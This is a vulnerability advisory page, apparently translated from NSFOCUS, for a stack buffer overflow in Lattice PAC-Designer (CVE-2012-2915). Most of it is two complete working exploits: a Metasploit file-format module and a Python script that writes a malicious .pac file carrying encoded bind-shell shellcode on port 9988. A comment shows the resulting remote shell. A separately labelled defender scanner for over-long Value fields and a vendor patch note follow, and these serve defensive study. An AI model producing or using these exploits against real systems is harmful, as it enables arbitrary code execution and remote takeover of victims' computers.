Security Research

Security Vulnerability
PAC-Designer '.pac' File Buffer Overflow Vulnerability

Release date: 2012-05-16
Update date: 2012-06-17

Affected systems:
Lattice Semiconductor PAC-Designer 6.2.1344

Description:
BUGTRAQ ID: 53566
CVE(CAN) ID: CVE-2012-2915

PAC-Designer is a simple, flexible and efficient tool for power and clock management.

PAC-Designer 6.2.1344 contains a stack buffer overflow vulnerability. A remote attacker can execute arbitrary code by supplying an over-long string in the Value tag inside the SymbolicSchematicData definition tag of a .pac file.

Source: anonymous

Test method:

Warning

The following program (method) may be offensive in nature and is provided for security research and teaching purposes only. Users bear all risk!

http://downloads.securityfocus.com/vulnerabilities/exploits/53566.py
http://downloads.securityfocus.com/vulnerabilities/exploits/53566.rb

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::FILEFORMAT

  def initialize(info={})
    super(update_info(info,
      'Name'           => "Lattice Semiconductor PAC-Designer 6.21 Symbol Value Buffer Overflow",
      'Description'    => %q{
          This module exploits a vulnerability found in Lattice Semiconductor PAC-Designer
        6.21.  As a .pac file, when supplying a long string of data to the 'value' field
        under the 'SymbolicSchematicData' tag, it is possible to cause a memory corruption
        on the stack, which results in arbitrary code execution under the context of the
        user.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Unknown',      #Discovery
          'juan vazquez', #Metasploit
          'sinn3r'        #Metasploit
        ],
      'References'     =>
        [
          ['CVE', '2012-2915'],
          ['OSVDB', '82001'],
          ['EDB', '19006'],
          ['BID', '53566'],
          ['URL', 'http://secunia.com/advisories/48741']
        ],
      'Payload'        =>
        {
          'BadChars' => "\x00\x3c\x3e",
          'StackAdjustment' => -3500,
        },
      'DefaultOptions'  =>
        {
          'ExitFunction' => "seh"
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          [
            'PAC-Designer 6.21 on Windows XP SP3',
            {
              # P/P/R in PACD621.exe
              # ASLR: False, Rebase: False, SafeSEH: False, OS: False
              'Ret' => 0x00805020
            }
          ],
        ],
      'Privileged'     => false,
      'DisclosureDate' => "May 16 2012",
      'DefaultTarget'  => 0))

    register_options(
      [
        OptString.new('FILENAME', [true, 'The filename', 'msf.pac'])
      ], self.class)
  end

  def exploit
    # The payload is placed in the <title> field
    p = payload.encoded

    # The trigger is placed in the <value> field, which will jmp to our
    # payload in the <title> field.
    buf  = "\x5f"    #POP EDI
    buf << "\x5f"    #POP EDI
    buf << "\x5c"    #POP ESP
    buf << "\x61"*6  #POPAD x 6
    buf << "\x51"    #PUSH ECX
    buf << "\xc3"    #RET
    buf << rand_text_alpha(96-buf.length, payload_badchars)
    buf << "\xeb\x9e#{rand_text_alpha(2, payload_badchars)}"  #Jmp back to the beginning of the buffer
    buf << [target.ret].pack('V')[0,3] # Partial overwrite

    xml = %Q|<?xml version="1.0"?>
<PacDesignData>
  <DocFmtVersion>1</DocFmtVersion>
  <DeviceType>ispPAC-CLK5410D</DeviceType>
  <CreatedBy>PAC-Designer 6.21.1336</CreatedBy>
  <SummaryInformation>
    <Title>#{p}</Title>
    <Author>#{Rex::Text.rand_text_alpha(6)}</Author>
  </SummaryInformation>

  <SymbolicSchematicData>
    <Symbol>
      <SymKey>153</SymKey>
      <NameText>Profile 0 Ref Frequency</NameText>
      <Value>#{buf}</Value>
    </Symbol>
  </SymbolicSchematicData>
</PacDesignData>|

    file_create(xml)
  end
end


#!/usr/bin/python2
# Python 2 script: the shellcode below is held in a plain str, which is a byte string in Python 2.

#------------------------------------------------------------------------------------#
# Exploit: Lattice Semiconductor PAC-Designer 6.21 (possibly all versions)           #
# CVE: CVE-2012-2915                                                                 #
# Author: b33f (Ruben Boonen) - http://www.fuzzysecurity.com/                        #
# OS: WinXP SP1                                                                      #
# Software: http://www.latticesemi.com/products/designsoftware/pacdesigner/index.cfm #
#------------------------------------------------------------------------------------#
# I didn't dig too deep but it seems portability to other OS builds is not promising  #
# due to SafeSEH and badchars in the application modules.                            #
#------------------------------------------------------------------------------------#
# root@bt:~# nc -nv 192.168.111.130 9988                                             #
#  (UNKNOWN) [192.168.111.130] 9988 (?) open                                         #
#  Microsoft Windows XP [Version 5.1.2600]                                           #
#  (C) Copyright 1985-2001 Microsoft Corp.                                           #
#                                                                                    #
#  C:\Documents and Settings\Owner\Desktop>                                          #
#------------------------------------------------------------------------------------#

filename="evil.PAC"

PAC1 = """<?xml version="1.0"?>

<PacDesignData>

<DocFmtVersion>1</DocFmtVersion>
<DeviceType>ispPAC-CLK5410D</DeviceType>

<CreatedBy>PAC-Designer 6.21.1336</CreatedBy>

<SummaryInformation>
<Title>Oops..</Title>
<Author>b33f</Author>
</SummaryInformation>

<SymbolicSchematicData>
  <Symbol>
    <SymKey>153</SymKey>
    <NameText>Profile 0 Ref Frequency</NameText>
    <Value>"""

#------------------------------------------------------------------------------------#
# msfpayload windows/shell_bind_tcp LPORT=9988 R| msfencode -e x86/alpha_mixed -t c  #
# [*] x86/alpha_mixed succeeded with size 744 (iteration=1)                          #
#------------------------------------------------------------------------------------#
shellcode = (
"\x89\xe3\xd9\xd0\xd9\x73\xf4\x5e\x56\x59\x49\x49\x49\x49\x49"
"\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a"
"\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32"
"\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
"\x79\x6c\x59\x78\x4e\x69\x35\x50\x35\x50\x57\x70\x53\x50\x6b"
"\x39\x6a\x45\x35\x61\x38\x52\x73\x54\x4c\x4b\x36\x32\x70\x30"
"\x4e\x6b\x56\x32\x36\x6c\x6e\x6b\x72\x72\x32\x34\x6e\x6b\x33"
"\x42\x66\x48\x56\x6f\x38\x37\x61\x5a\x45\x76\x56\x51\x59\x6f"
"\x45\x61\x59\x50\x6e\x4c\x67\x4c\x73\x51\x73\x4c\x74\x42\x46"
"\x4c\x45\x70\x4b\x71\x58\x4f\x54\x4d\x63\x31\x69\x57\x78\x62"
"\x7a\x50\x46\x32\x63\x67\x6e\x6b\x70\x52\x66\x70\x4e\x6b\x30"
"\x42\x47\x4c\x76\x61\x6e\x30\x4e\x6b\x57\x30\x73\x48\x4b\x35"
"\x69\x50\x72\x54\x53\x7a\x75\x51\x6e\x30\x36\x30\x6e\x6b\x72"
"\x68\x55\x48\x6e\x6b\x30\x58\x31\x30\x65\x51\x5a\x73\x7a\x43"
"\x75\x6c\x72\x69\x6c\x4b\x64\x74\x4c\x4b\x45\x51\x6a\x76\x74"
"\x71\x79\x6f\x76\x51\x4f\x30\x6c\x6c\x69\x51\x6a\x6f\x64\x4d"
"\x35\x51\x69\x57\x45\x68\x4d\x30\x74\x35\x6b\x44\x75\x53\x73"
"\x4d\x49\x68\x67\x4b\x61\x6d\x45\x74\x30\x75\x69\x72\x32\x78"
"\x4c\x4b\x51\x48\x36\x44\x55\x51\x38\x53\x51\x76\x6c\x4b\x66"
"\x6c\x42\x6b\x6c\x4b\x66\x38\x37\x6c\x66\x61\x38\x53\x4e\x6b"
"\x63\x34\x6c\x4b\x67\x71\x48\x50\x6d\x59\x72\x64\x56\x44\x74"
"\x64\x33\x6b\x31\x4b\x53\x51\x66\x39\x62\x7a\x72\x71\x59\x6f"
"\x4b\x50\x33\x68\x31\x4f\x62\x7a\x4c\x4b\x35\x42\x4a\x4b\x6d"
"\x56\x31\x4d\x42\x48\x36\x53\x30\x32\x57\x70\x33\x30\x42\x48"
"\x71\x67\x52\x53\x57\x42\x43\x6f\x71\x44\x42\x48\x50\x4c\x43"
"\x47\x71\x36\x53\x37\x79\x6f\x58\x55\x58\x38\x6a\x30\x56\x61"
"\x65\x50\x73\x30\x76\x49\x6a\x64\x43\x64\x30\x50\x52\x48\x47"
"\x59\x4d\x50\x30\x6b\x57\x70\x39\x6f\x6e\x35\x72\x70\x76\x30"
"\x52\x70\x36\x30\x31\x50\x36\x30\x43\x70\x76\x30\x32\x48\x69"
"\x7a\x64\x4f\x69\x4f\x79\x70\x49\x6f\x79\x45\x6e\x69\x4a\x67"
"\x34\x71\x49\x4b\x62\x73\x43\x58\x63\x32\x77\x70\x56\x47\x76"
"\x64\x6d\x59\x79\x76\x32\x4a\x56\x70\x32\x76\x61\x47\x63\x58"
"\x38\x42\x4b\x6b\x67\x47\x53\x57\x59\x6f\x4e\x35\x31\x43\x76"
"\x37\x33\x58\x48\x37\x69\x79\x35\x68\x69\x6f\x79\x6f\x6e\x35"
"\x30\x53\x31\x43\x63\x67\x35\x38\x51\x64\x38\x6c\x75\x6b\x49"
"\x71\x59\x6f\x79\x45\x43\x67\x6c\x49\x5a\x67\x42\x48\x52\x55"
"\x30\x6e\x70\x4d\x61\x71\x79\x6f\x58\x55\x32\x48\x33\x53\x30"
"\x6d\x33\x54\x43\x30\x4e\x69\x49\x73\x56\x37\x33\x67\x62\x77"
"\x54\x71\x59\x66\x71\x7a\x57\x62\x32\x79\x36\x36\x38\x62\x6b"
"\x4d\x61\x76\x58\x47\x51\x54\x74\x64\x57\x4c\x75\x51\x55\x51"
"\x6e\x6d\x77\x34\x46\x44\x44\x50\x68\x46\x37\x70\x50\x44\x31"
"\x44\x76\x30\x72\x76\x61\x46\x72\x76\x50\x46\x43\x66\x72\x6e"
"\x31\x46\x76\x36\x71\x43\x30\x56\x33\x58\x43\x49\x38\x4c\x47"
"\x4f\x6c\x46\x59\x6f\x6b\x65\x4f\x79\x79\x70\x32\x6e\x32\x76"
"\x57\x36\x39\x6f\x70\x30\x43\x58\x45\x58\x4b\x37\x35\x4d\x73"
"\x50\x79\x6f\x6e\x35\x4d\x6b\x6c\x30\x6c\x75\x79\x32\x73\x66"
"\x62\x48\x6f\x56\x4c\x55\x4d\x6d\x6d\x4d\x39\x6f\x6a\x75\x65"
"\x6c\x47\x76\x73\x4c\x64\x4a\x6d\x50\x79\x6b\x49\x70\x33\x45"
"\x54\x45\x4f\x4b\x63\x77\x47\x63\x33\x42\x72\x4f\x51\x7a\x37"
"\x70\x30\x53\x79\x6f\x68\x55\x41\x41")

#------------------------------------------------------------------------------------#
# SEH: 0x77512879 : pop esi # pop ecx # ret - SHELL32.dll                            #
# nSEH: \xEB\x05                                                                     #
#------------------------------------------------------------------------------------#
b00m = "\x90"*20 + shellcode
payload = "A"*98 + "\xEB\x05\x79\x28\x51\x77" + b00m + "C"*(5000-len(b00m))

PAC2 = """</Value>
  </Symbol>
</SymbolicSchematicData>

</PacDesignData>"""

buffer = PAC1 + payload + PAC2

# Write in binary mode so the raw shellcode bytes reach the file unchanged
with open(filename, 'wb') as textfile:
    textfile.write(buffer)
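As an added defender-side example (not part of this advisory or of either exploit listing above), a tolerant scanner that pulls every <Value> element out of a .pac file with a byte-level regex, so it still works when the file carries raw bytes that a strict XML parser would reject, and flags values that are over-long or contain non-printable bytes. The two sample documents and the 64-byte threshold are constructed assumptions; the exploit layouts above place the overwrite past 96 or 98 bytes of filler, so the threshold sits well below that.

```python
import re

# Constructed sample, not from the page: a benign .pac fragment in the layout quoted above
BENIGN_PAC = b"""<?xml version="1.0"?>
<PacDesignData>
  <SymbolicSchematicData>
    <Symbol>
      <SymKey>153</SymKey>
      <NameText>Profile 0 Ref Frequency</NameText>
      <Value>100.000</Value>
    </Symbol>
  </SymbolicSchematicData>
</PacDesignData>"""

# Constructed sample: same layout with an oversized Value made of filler bytes only
# (98 bytes of padding, a two-byte short jump, 5000 bytes of filler; no payload)
MALICIOUS_PAC = BENIGN_PAC.replace(
    b"<Value>100.000</Value>",
    b"<Value>" + b"A" * 98 + b"\xeb\x05" + b"C" * 5000 + b"</Value>")

# Byte-level match so files with non-UTF-8 bytes (which break strict XML parsers) still get scanned
VALUE_RE = re.compile(rb"<Value>(.*?)</Value>", re.DOTALL)
MAX_VALUE_LEN = 64  # assumption: legitimate symbol values are short numeric strings

def scan_values(data):
    """Return (length, non_printable_count, suspicious) for each <Value> in the raw file bytes."""
    findings = []
    for m in VALUE_RE.finditer(data):
        val = m.group(1)
        nonprint = sum(1 for b in val if b < 0x20 or b > 0x7e)
        findings.append((len(val), nonprint, len(val) > MAX_VALUE_LEN or nonprint > 0))
    return findings

def is_suspicious(data):
    """True when any Value is over-long or carries non-printable bytes."""
    return any(f[2] for f in scan_values(data))

def scan_file(path):
    """Scan a .pac file on disk; returns the per-Value findings list."""
    with open(path, "rb") as fh:
        return scan_values(fh.read())

if __name__ == "__main__":
    import sys
    for p in sys.argv[1:]:
        print(p, "SUSPICIOUS" if any(f[2] for f in scan_file(p)) else "ok")
```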

Recommendations:
Vendor patch:

Lattice Semiconductor
---------------------
The vendor has released an upgrade patch that fixes this security issue; please download it from the vendor's homepage:

http://www.latticesemi.com/zh-CN/Products/DesignSoftwareAndIP/MixedSignalDS/PacDesigner.aspx

This vulnerability advisory was translated and compiled by NSFOCUS; all rights reserved, reproduction without permission is prohibited.